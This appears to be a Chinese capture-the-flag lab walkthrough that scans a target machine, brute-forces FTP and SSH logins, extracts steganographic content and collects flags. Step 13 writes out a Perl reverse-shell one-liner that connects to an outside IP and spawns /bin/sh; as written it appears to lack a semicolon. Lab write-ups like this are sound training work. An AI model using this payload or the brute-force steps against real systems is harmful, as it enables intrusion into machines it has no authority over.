一、使用工具
1.kali
2.nmap
3.Yakit
4.steghide
5.dirsearch
6.nc
二、打靶流程
1.在kali中使用nmap进行端口的扫描
2.使用dirsearch -u 目标ip 进行扫描
1)对扫描出的目录进行访问并查看网页源码发现有提示
2)再次访问提示的文件得到秘钥
3.之前扫出有21端口所以对ftp服务进行暴力破解(用户:ftp,密码:123456)
4.使用ftp远程连接靶机发现有图片猜测其存在隐写
5.使用steghide info trytofind.jpg和steghide extract -sf trytofind.jpg获取隐写的内容
6.爆破ssh的密码
7.远程连接ssh
8.查看文件看到一个user1文件打开找到第一个flag
9.返回上一级目录发现另一个用户目录
10.查看文件发现第二个flag文件
11.使用SSH登录第二个用户发现能够直接登录(如果不行查看历史命令,使用其中的登录方式)
12.查看能够执行sudo的命令:sudo -l
13.使用perl进行提权:perl -e 'use Socket;$i="192.168.21.55";$p=9989 socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
14.Ls -a查看隐藏文件找到flag